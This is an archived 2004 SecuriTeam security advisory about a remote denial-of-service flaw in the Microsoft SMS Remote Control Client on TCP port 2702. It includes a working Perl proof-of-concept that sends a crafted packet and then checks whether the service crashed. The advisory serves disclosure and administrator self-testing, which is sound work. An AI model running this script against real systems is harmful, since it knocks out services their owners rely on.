[NT] Denial of Service in Microsoft SMS Client (Exploit)
From: SecuriTeam (support_at_securiteam.com)
Date: 07/25/04
- Previous message: SecuriTeam: "[UNIX] HP dced Remote Command Execution"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
To: list@securiteam.com Date: 25 Jul 2004 16:30:11 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
Denial of Service in Microsoft SMS Client (Exploit)
------------------------------------------------------------------------
SUMMARY
Microsoft Systems Management Server provides configuration management
solution for Windows platform. It is widely deployed in medium and large
network environments. A flaw in SMS Remote Control service makes possible
to crash the service remotely leading to the DoS condition.
The included Perl code will demonstrate the vulnerability against a live
server, so administrators will be able to test the security of their own
Systems Management Server's.
DETAILS
Vulnerable Systems:
* Microsoft Systems Management Server version 2.50.2726.0
SMS Remote Control Client service is listening on TCP ports 2701 and 2702.
The service performs basic signature checks and size tests on received
data and assumes the data is correct if those tests pass. It is possible
to create a data packet that will go through basic checks and throw an
exception by causing the server to read or write to an invalid memory
address. It is also possible to specify the memory address value in the
data packet. Initial analysis showed that the problem is not [easily]
exploitable because there is no buffer overflow condition and it is not
possible to specify the data to be written to the memory. The exception
occurs in multprot.dll library when the service makes an API call with
invalid parameters.
Demonstration:
The problem can be reproduced by sending the "RCH0####RCHE" string
followed by a large number of characters (over 130) to TCP port 2702.
Proof of Concept Code:
You may test your own Systems Management Server's for vulnerability to
this issue by using the following Perl code:
#!/usr/bin/perl
#############################
#
# SMS DOS proof of concept and test code
# MacDefender / SRR project group of Ready Response wang@readyresponse.org
#
#############################
use Socket;
use IO::Socket;
if (@ARGV != 1)
{
print "usage: $0 <host or ip>\n";
exit;
}
$host = shift(@ARGV);
$hexmsg =
converthex("5243483016004000524348455858585858585858585858585858585858585
858585858585858585858585858585858585858585858585858585858585858585858585
858585858585858585858585858585858585858585858585858585858585858585858585
858585858585858585858585858585858585858585858585858585858585858585858585
858585858");
print "\nCreating socket for connection to: $host\n\n";
my $sock1 = IO::Socket::INET->new (PeerAddr => $host, PeerPort =>
"(2702)", Proto => "tcp") or die("Could not create socket: $!\n");
$sock1->autoflush(1);
print $sock1 "$hexmsg";
while (<$sock1>)
{
print;
}
print "\nPacket sent to $host (please wait) ...\n";
sleep(2);
print "Verifying status of $host ...\n";
sleep(2);
my $sock2 = IO::Socket::INET->new (PeerAddr => $host, PeerPort =>
'(2702)', Proto => 'tcp') or die("\nDOS was successful - $host is down
..\n");
print "\nAttempt was not successful. $host is still alive and responding
..\n";
close($sock1);
close($sock2);
#############################
# End main code, start subs
#############################
sub converthex
{
local ($l) = @_;
$l =~ s/([0-9a-f]{1,2})\s*/sprintf("%c",hex($1))/egi;
return $l;
}
#############################
# End code
#############################
ADDITIONAL INFORMATION
The information has been provided by <mailto:vuln@hexview.com> Hexview
Vulnerability Disclosure.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Previous message: SecuriTeam: "[UNIX] HP dced Remote Command Execution"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
